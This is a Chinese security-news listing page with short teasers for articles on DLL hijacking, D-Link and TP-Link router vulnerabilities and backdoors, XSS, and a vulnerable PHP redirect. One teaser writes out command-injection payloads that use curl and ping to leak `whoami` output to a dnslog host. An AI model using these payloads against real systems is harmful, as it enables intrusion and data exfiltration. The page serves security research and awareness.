link - 第 10 | CN-SEC 中文网

逆向工程

DLL劫持与注入

本文根据广东靓仔个人技术笔记整理1. DLL劫持通常情况下程序可以指定在运行时加载的DLL（Dynamic link Library，动态连接库）。不正确或模糊地指定所需DLL的程序可能会打...

10月31日719 views评论

安全文章

今年2月，D-Link发布了针对两个身份验证绕过漏洞CVE-2020-8863 和 CVE-2020-8864的固件补丁程序，这些漏洞影响了D-Link DIR-882，DIR-878和DIR-...

10月11日318 views评论

安全文章

本报告由CNCERT物联网安全研究团队与360网络安全研究院共同发布一、背景介绍2020年7月4号，CNCERT物联网安全研究团队与360网络安全研究院共同分析，监测到有攻击者使用D-Link摄像头2...

09月27日503 views评论

7月早些时间，研究人员爆出D-link 路由器固件镜像泄露了用来加密专用固件二进制文件的密钥。近日，又有ACE 团队研究人员爆出D-Link路由器的5个严重安全漏洞，攻击者利用这些漏洞可以实现网络入侵...

07月30日安全文章313 views评论

Author:毒药这个XSS好像是从12年3.1开始就存在的吧，到现在的3.4还是没有修复。

01月01日漏洞时代420 views评论

漏洞时代

网上乱逛看到的内容，转了过来，做个记录……TP-LINK 路由器后门，TPLINK 存在一个 Shell 调试后门，TPLINK WR941N V2_090803 路由器后门，T...

12月31日1,446 views评论

易想团购系统link.php页面内代码[php]if($_REQUEST['act']=='go') //link标签 go { $url = ($_REQUEST['url'])...

12月31日漏洞时代384 views评论

linux： curl http://xxx.dnslog.link/`whoami` ping -c 1 `whoami`.xxx.dnslog.link 如果碰到内容有空格（换...

05月19日颓废's Blog2,350 views评论

颓废's Blog

D-Link Dir-850L 路由器的固件可以从官方下载获取，这里下载1.14.B07版本的固件，地址: ftp://ftp2.dlink.com/PRODUCTS/DIR-85...

05月19日2,345 views评论

dmsec

之前的6个月，D-Link都不断使坏，把我整的晕头转向。今天我想找些乐子，登陆他们的网站，结果就看到了惨不忍睹的一幕：这个路由器上运行的固件有很多bug，而最变态的地方在于，它居...

05月08日1,136 views评论